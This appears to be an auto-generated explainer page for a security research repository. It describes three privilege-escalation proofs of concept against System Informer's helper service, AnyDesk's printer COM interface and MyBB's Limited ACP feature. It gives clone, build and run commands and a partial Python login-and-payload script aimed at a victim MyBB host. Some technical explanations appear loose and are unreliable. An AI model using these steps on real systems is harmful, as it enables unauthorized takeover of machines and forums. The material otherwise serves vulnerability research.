How to Find Local Privilege Escalation Exploits in the Exploitarium Repository
The Exploitarium repository by bikini contains several documented, self-contained proof-of-concept exploits demonstrating local privilege escalation (LPE) from low-integrity user contexts to SYSTEM or administrative privileges across Windows services and web applications.
The bikini/exploitarium repository serves as a curated archive of security research artifacts. Researchers looking for local privilege escalation exploits will find multiple PoCs that demonstrate elevation techniques, each packaged with dedicated README files, build instructions, and annotated source code.
System Informer phsvc Trusted-Host LPE
The first LPE target is System Informer's privileged helper service (phsvc). This PoC demonstrates how to bypass Authenticode trust verification to execute code in the helper's security context.
Vulnerability Mechanics
The helper service accepts ALPC connections from any process whose image holds Authenticode trust. According to the source in systeminformer-phsvc-trusted-host-lpe-poc/poc.c, the service verifies VrTrusted status of the client executable but does not validate loaded DLLs. By launching a trusted host such as rundll32.exe and injecting an attacker-controlled DLL, the exploit convinces the helper that the client is legitimate.
The PoC then invokes the privileged API PhSvcCreateProcessIgnoreIfeoDebuggerApiNumber to spawn a process within the helper's security context—effectively elevating from medium integrity to SYSTEM.
Building and Executing the PoC
Navigate to the exploit directory and compile using the provided build script:
git clone https://github.com/bikini/exploitarium.git
cd exploitarium/systeminformer-phsvc-trusted-host-lpe-poc
./build.bat
This produces phsvc_rundll_poc.dll and phsvc_unsigned_client.exe. Execute the DLL via the trusted host to trigger the escalation:
rundll32.exe phsvc_rundll_poc.dll,Run "%TEMP%\systeminformer_phsvc_poc.txt"
Verify successful exploitation by checking for the marker file:
type "%TEMP%\systeminformer_phsvc_poc.txt"
If the output reads SYSTEMINFORMER_PHSVC_POC, the code executed within the elevated helper context.
AnyDesk Printer COM Impersonation LPE
This PoC targets the AnyDesk Windows service, converting a low-privileged local session into the service identity (NT AUTHORITY\SYSTEM).
Exploit Architecture
As implemented in anydesk-printer-com-impersonation-poc/poc.py, the exploit abuses a race condition in AnyDesk's printer-related COM interface. The privileged service validates printer commands through this interface, allowing a local attacker to trigger execution of attacker-controlled code under the service account.
Running the Exploit
Install the required dependencies specified in the README:
pip install -r requirements.txt
Execute the Python script to trigger the impersonation:
python poc.py
Confirm elevation by verifying the AnyDesk service process ownership:
tasklist /FI "IMAGENAME eq AnyDesk.exe"
The process should now run under the SYSTEM account, confirming successful local privilege escalation.
MyBB Limited ACP to Admin Escalation
While targeting a web application, this PoC is categorized as a local escalation scenario because the attacker requires only a low-privilege MyBB account to achieve full administrative access.
Technical Details
The vulnerability resides in the "Limited ACP" feature. The exploit script located at mybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py abuses insufficient validation in role-checking logic, injecting crafted HTTP requests that bypass restrictions and invoke privileged admin actions.
Exploit Script Usage
The Python script automates authentication and payload delivery:
import requests
TARGET = "http://victim.local/mybb"
USERNAME = "lowuser"
PASSWORD = "password"
session = requests.Session()
session.post(f"{TARGET}/member.php", data={
"action": "do_login",
"username": USERNAME,
"password": PASSWORD
})
# Crafted payload bypasses Limited ACP restrictions
payload = {"module": "admin", "action": "upgrade", "admin_token": "..."}
resp = session.post(f"{TARGET}/admin.php", data=payload)
Successful execution promotes the regular user account to full Administrator within the MyBB instance.
Summary
- The Exploitarium repository contains three distinct local privilege escalation PoCs targeting System Informer, AnyDesk, and MyBB.
- Each PoC is self-contained with dedicated README files in their respective directories explaining vulnerability mechanics and build instructions.
- Windows LPEs demonstrate service impersonation techniques via ALPC trust bypass and COM interface race conditions.
- No malicious payloads are included—all exploits use marker-only demonstrations to prove execution without causing system damage.
- Source files are located at
systeminformer-phsvc-trusted-host-lpe-poc/poc.c,anydesk-printer-com-impersonation-poc/poc.py, andmybb-limited-acp-to-admin/poc/mybb_limited_acp_to_admin.py.
Frequently Asked Questions
Does the Exploitarium repository contain remote code execution exploits?
No. According to the repository source analysis, the collection focuses exclusively on local privilege escalation techniques. The repository explicitly excludes remote-code-execution (RCE) payloads, containing only marker-only demonstrations that prove escalation paths without exposing external attack surfaces.
What compilation requirements exist for the System Informer LPE?
The System Informer PoC requires MinGW-w64 GCC on Windows to compile both the DLL and the unsigned client executable. The build.bat script in systeminformer-phsvc-trusted-host-lpe-poc/ automates this process, producing phsvc_rundll_poc.dll and the associated client binary.
Are these exploits weaponized with actual malicious payloads?
No. The repository maintains a strict policy of including only proof-of-concept code with safe marker files. For example, the System Informer PoC writes the string SYSTEMINFORMER_PHSVC_POC to a temporary file to demonstrate successful SYSTEM-level execution, rather than deploying harmful system modifications or backdoors.
Why is the MyBB exploit categorized as local privilege escalation?
Although the target is a web application, the repository classifies this as a local privilege escalation because the attack requires only a low-privilege account on the target system rather than unauthenticated remote access. As documented in mybb-limited-acp-to-admin/README.md, the attacker must already possess valid MyBB credentials, distinguishing it from remote exploitation scenarios.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →